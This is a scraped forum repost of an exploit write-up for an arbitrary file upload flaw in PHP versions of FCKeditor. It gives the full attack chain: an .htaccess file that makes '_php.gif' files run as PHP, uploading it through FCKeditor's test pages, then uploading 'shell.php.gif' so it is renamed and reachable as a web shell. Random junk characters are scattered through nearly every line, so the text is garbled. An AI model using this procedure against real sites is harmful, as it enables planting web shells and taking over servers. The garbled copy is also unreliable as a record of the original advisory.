FCKeditor所有php版本Upload上传漏洞
" z j+ X: N! X2 u1 }作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07( Q% [/ x, m" i" w9 Y
减小字体 增大字体9 J) K) I- @% j: z
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability! {* l2 ]' ?: b8 z4 O: p9 t: R# @
[+] Date: 2011& [6 q: v/ L: b5 _' \
[+] Author : sinesafe.cn) b7 @# N4 i6 _6 E1 ^$ |+ S9 J$ N
[+] Website : WwW.sinesafe.cn
% J- h2 n* \$ t: x, h8 p———————————————————
: w% Q9 q3 D/ I1.create a htaccess file:
% U9 q' e/ z8 G8 tcode:4 A8 m6 _+ h/ E/ a
<FilesMatch “_php.gif”>7 _" \% E+ k* t$ O- X
SetHandler application/x-httpd-php0 J& z7 d8 ?, y* B
</FilesMatch>
6 ]: r4 b z8 N! t
0 ^5 G6 i7 G$ u% T( L @2.Now upload this htaccess with FCKeditor.
% g+ i8 `2 t" A8 A! B4 w
1 A% U( ?) P7 B$ i( H7 }http://www.sinesafe.cn/FCKeditor ... er/upload/test.html2 d" h- g; X, u" {
h( i9 b& V v* D; P
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
" T" S" `# f/ P# b" r8 Q3 \( [8 ]* t: K, z! }, T7 g/ X6 ?
———————————————————————————————-
. F5 [+ v4 y* |8 g5 |( r2 t3.Now upload shell.php.gif with FCKeditor. i3 `6 Z, G# A, z. T" L3 x+ _
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
9 m+ e9 |8 E, [: m: r8 B9 s7 C5.http://www.sinesafe.cn/anything/shell_php.gif
. _. u& t% X( l! c( ?3 n$ K6.Now shell is available from server. |
3 p2 u- |& e% L* S- C0 Y2 g! [9 T% H% a0 C9 N' p% f O: Z9 O& j: l
; C, J" B I% T# i |
发表于 2013-10-27 17:25:21
收藏
支持
反对